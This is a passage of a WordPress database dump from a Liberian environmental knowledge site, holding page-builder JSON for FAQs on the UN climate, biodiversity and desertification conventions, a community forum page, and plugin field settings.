href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(17044,335,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:21:\"typography_typography\";i:1;s:11:\"title_color\";i:1;}}}}s:9:\"accordion\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:4:\"tabs\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}s:5:\"style\";a:1:{s:12:\"section_typo\";a:3:{s:13:\"heading_color\";i:1;s:10:\"color_text\";i:1;s:16:\"color_link_hover\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}}'),(17046,2552,'_elementor_edit_mode','builder'),(17047,2552,'_elementor_template_type','wp-page'),(17048,2552,'_elementor_version','2.7.5'),(17049,2552,'_wp_page_template','default'),(17050,2552,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.<\\/p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.<\\/p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Join Us<\\/span>!<\\/a><\\/p><p><strong>Added Tools to the Community:<\\/strong><\\/p><p>Members Chat (Activated)<\\/p><p>Group Chatting (In Progress)<\\/p><p>Group online meetings hosting or Video Conferencing (In Progress)<\\/p><p>Events Setup (In Progress)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(17053,2553,'_elementor_edit_mode','builder'),(17054,2553,'_elementor_template_type','wp-page'),(17055,2553,'_elementor_version','2.7.5'),(17056,2553,'_wp_page_template','default'),(17057,2553,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.<\\/p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.<\\/p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Join Us<\\/span>!<\\/a><\\/p><p><strong>Added Tools to the Community:<\\/strong><\\/p><p>Members Chat (Activated)<\\/p><p>Group Chatting (In Progress)<\\/p><p>Group online meetings hosting or Video Conferencing (In Progress)<\\/p><p>Events Setup (In Progress)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(17058,2553,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:1;}}}}}'),(17072,2554,'_wp_attached_file','2019/11/Liberia-Mineral-Policy.pdf'),(17074,1701,'_pods_attached_document','a:1:{i:0;i:2554;}'),(17092,2558,'_edit_lock','1574294998:1'),(17093,2558,'_edit_last','1'),(17097,2558,'_wp_page_template','default'),(17098,2558,'_elementor_controls_usage','a:0:{}'),(17099,2558,'_pods_project_status','On-going'),(17101,2558,'contact_email',''),(17102,2558,'contact_phone',''),(17103,2558,'project_link','<a href=\"https://mme.gov.lr/coastal-defense-project/\" target=\"_blank\" rel=\"noopener\">https://mme.gov.lr/coastal-defense-project/</a>'),(17117,449,'supports_jetpack_publicize','0'),(17118,449,'supports_jetpack_markdown','0'),(17119,453,'oembed_enabled_providers_gfycatcom','0'),(17120,453,'oembed_enabled_providers_icloudcom','0'),(17121,453,'oembed_enabled_providers_mesh','0'),(17122,453,'oembed_enabled_providers_sketchfabcom','0'),(17123,453,'oembed_enabled_providers_songlink','0'),(17124,453,'oembed_enabled_providers_wistiacom','0'),(17125,453,'paragraph_repeatable','0'),(17131,2569,'_elementor_controls_usage','a:0:{}'),(17132,2569,'type','text'),(17133,2569,'required','0'),(17134,2569,'text_allow_shortcode','0'),(17135,2569,'text_allow_html','0'),(17136,2569,'text_allowed_html_tags','strong em a ul ol li b i'),(17137,2569,'text_max_length','255'),(17138,2569,'website_format','normal'),(17139,2569,'website_allow_port','0'),(17140,2569,'website_clickable','0'),(17141,2569,'website_new_window','0'),(17142,2569,'website_max_length','255'),(17143,2569,'website_html5','0'),(17144,2569,'phone_format','999-999-9999 x999'),(17145,2569,'phone_enable_phone_extension','1'),(17146,2569,'phone_max_length','25'),(17147,2569,'phone_html5','0'),(17148,2569,'email_max_length','255'),(17149,2569,'email_html5','0'),(17150,2569,'password_max_length','255'),(17151,2569,'paragraph_allow_html','1'),(17152,2569,'paragraph_oembed','0'),(17153,2569,'paragraph_wptexturize','1'),(17154,2569,'paragraph_convert_chars','1'),(17155,2569,'paragraph_wpautop','1'),(17156,2569,'paragraph_allow_shortcode','0'),(17157,2569,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(17158,2569,'paragraph_max_length','0'),(17159,2569,'wysiwyg_editor','tinymce'),(17160,2569,'wysiwyg_media_buttons','1'),(17161,2569,'wysiwyg_oembed','0'),(17162,2569,'wysiwyg_wptexturize','1'),(17163,2569,'wysiwyg_convert_chars','1'),(17164,2569,'wysiwyg_wpautop','1'),(17165,2569,'wysiwyg_allow_shortcode','0'),(17166,2569,'code_allow_shortcode','0'),(17167,2569,'code_max_length','0'),(17168,2569,'datetime_type','format'),(17169,2569,'datetime_format','mdy'),(17170,2569,'datetime_time_type','12'),(17171,2569,'datetime_time_format','h_mma'),(17172,2569,'datetime_time_format_24','hh_mm'),(17173,2569,'datetime_allow_empty','1'),(17174,2569,'datetime_html5','0'),(17175,2569,'date_type','format'),(17176,2569,'date_format','mdy'),(17177,2569,'date_allow_empty','1'),(17178,2569,'date_html5','0'),(17179,2569,'time_type','12'),(17180,2569,'time_format','h_mma'),(17181,2569,'time_format_24','hh_mm'),(17182,2569,'time_allow_empty','1'),(17183,2569,'time_html5','0'),(17184,2569,'number_format_type','number'),(17185,2569,'number_format','i18n'),(17186,2569,'number_decimals','0'),(17187,2569,'number_format_soft','0'),(17188,2569,'number_step','1'),(17189,2569,'number_min','0'),(17190,2569,'number_max','100'),(17191,2569,'number_max_length','12'),(17192,2569,'currency_format_type','number'),(17193,2569,'currency_format_sign','usd'),(17194,2569,'currency_format_placement','before'),(17195,2569,'currency_format','i18n'),(17196,2569,'currency_decimals','2'),(17197,2569,'currency_decimal_handling','none'),(17198,2569,'currency_step','1'),(17199,2569,'currency_min','0'),(17200,2569,'currency_max','1000'),(17201,2569,'currency_max_length','12'),(17202,2569,'file_format_type','single'),(17203,2569,'file_uploader','attachment'),(17204,2569,'file_attachment_tab','upload'),(17205,2569,'file_edit_title','1'),(17206,2569,'file_show_edit_link','0'),(17207,2569,'file_linked','0'),(17208,2569,'file_limit','0'),(17209,2569,'file_restrict_filesize','10MB'),(17210,2569,'file_type','images'),(17211,2569,'file_field_template','rows'),(17212,2569,'file_add_button','Add File'),(17213,2569,'file_modal_title','Attach a file'),(17214,2569,'file_modal_add_button','Add File'),(17215,2569,'file_wp_gallery_output','0'),(17216,2569,'file_wp_gallery_link','post'),(17217,2569,'file_wp_gallery_columns','1'),(17218,2569,'file_wp_gallery_random_sort','0'),(17219,2569,'file_wp_gallery_size','thumbnail'),(17220,2569,'oembed_width','0'),(17221,2569,'oembed_height','0'),(17222,2569,'oembed_show_preview','0'),(17223,2569,'oembed_restrict_providers','0'),(17224,2569,'oembed_enabled_providers_amazoncn','0'),(17225,2569,'oembed_enabled_providers_amazoncouk','0'),(17226,2569,'oembed_enabled_providers_amazoncom','0'),(17227,2569,'oembed_enabled_providers_amazoncomau','0'),(17228,2569,'oembed_enabled_providers_amazonin','0'),(17229,2569,'oembed_enabled_providers_animotocom','0'),(17230,2569,'oembed_enabled_providers_cloudupcom','0'),(17231,2569,'oembed_enabled_providers_collegehumorcom','0'),(17232,2569,'oembed_enabled_providers_crowdsignalcom','0'),(17233,2569,'oembed_enabled_providers_dailymotioncom','0'),(17234,2569,'oembed_enabled_providers_facebookcom','0'),(17235,2569,'oembed_enabled_providers_flickrcom','0'),(17236,2569,'oembed_enabled_providers_gfycatcom','0'),(17237,2569,'oembed_enabled_providers_hulucom','0'),(17238,2569,'oembed_enabled_providers_icloudcom','0'),(17239,2569,'oembed_enabled_providers_imgurcom','0'),(17240,2569,'oembed_enabled_providers_instagramcom','0'),(17241,2569,'oembed_enabled_providers_issuucom','0'),(17242,2569,'oembed_enabled_providers_kickstartercom','0'),(17243,2569,'oembed_enabled_providers_mesh','0'),(17244,2569,'oembed_enabled_providers_meetupcom','0'),(17245,2569,'oembed_enabled_providers_mixcloudcom','0'),(17246,2569,'oembed_enabled_providers_redditcom','0'),(17247,2569,'oembed_enabled_providers_reverbnationcom','0'),(17248,2569,'oembed_enabled_providers_screencastcom','0'),(17249,2569,'oembed_enabled_providers_scribdcom','0'),(17250,2569,'oembed_enabled_providers_sketchfabcom','0'),(17251,2569,'oembed_enabled_providers_slidesharenet','0'),(17252,2569,'oembed_enabled_providers_smugmugcom','0'),(17253,2569,'oembed_enabled_providers_someecardscom','0'),(17254,2569,'oembed_enabled_providers_songlink','0'),(17255,2569,'oembed_enabled_providers_soundcloudcom','0'),(17256,2569,'oembed_enabled_providers_speakerdeckcom','0'),(17257,2569,'oembed_enabled_providers_spotifycom','0'),(17258,2569,'oembed_enabled_providers_tedcom','0'),(17259,2569,'oembed_enabled_providers_tumblrcom','0'),(17260,2569,'oembed_enabled_providers_twittercom','0'),(17261,2569,'oembed_enabled_providers_vimeocom','0'),(17262,2569,'oembed_enabled_providers_wistiacom','0'),(17263,2569,'oembed_enabled_providers_wordpresscom','0'),(17264,2569,'oembed_enabled_providers_wordpresstv','0'),(17265,2569,'oembed_enabled_providers_youtubecom','0'),(17266,2569,'pick_format_type','single'),(17267,2569,'pick_format_single','dropdown'),(17268,2569,'pick_format_multi','checkbox'),(17269,2569,'pick_allow_add_new','1'),(17270,2569,'pick_taggable','0'),(17271,2569,'pick_show_icon','1'),(17272,2569,'pick_show_edit_link','1'),(17273,2569,'pick_show_view_link','1'),(17274,2569,'pick_limit','0'),(17275,2569,'pick_user_role','a:0:{}'),(17276,2569,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(17277,2569,'boolean_format_type','checkbox'),(17278,2569,'boolean_yes_label','Yes'),(17279,2569,'boolean_no_label','No'),(17280,2569,'admin_only','0'),(17281,2569,'restrict_role','0'),(17282,2569,'restrict_capability','0'),(17283,2569,'hidden','0'),(17284,2569,'read_only','0'),(17285,2569,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(17286,2569,'rest_read','0'),(17287,2569,'rest_write','0'),(17288,2569,'rest_pick_response','array'),(17289,2569,'rest_pick_depth','2'),(17290,2570,'_elementor_controls_usage','a:0:{}'),(17291,2570,'type','text'),(17292,2570,'required','0'),(17293,2570,'text_allow_shortcode','0'),(17294,2570,'text_allow_html','0'),(17295,2570,'text_allowed_html_tags','strong em a ul ol li b i'),(17296,2570,'text_max_length','255'),(17297,2570,'website_format','normal'),(17298,2570,'website_allow_port','0'),(17299,2570,'website_clickable','0'),(17300,2570,'website_new_window','0'),(17301,2570,'website_max_length','255'),(17302,2570,'website_html5','0'),(17303,2570,'phone_format','999-999-9999 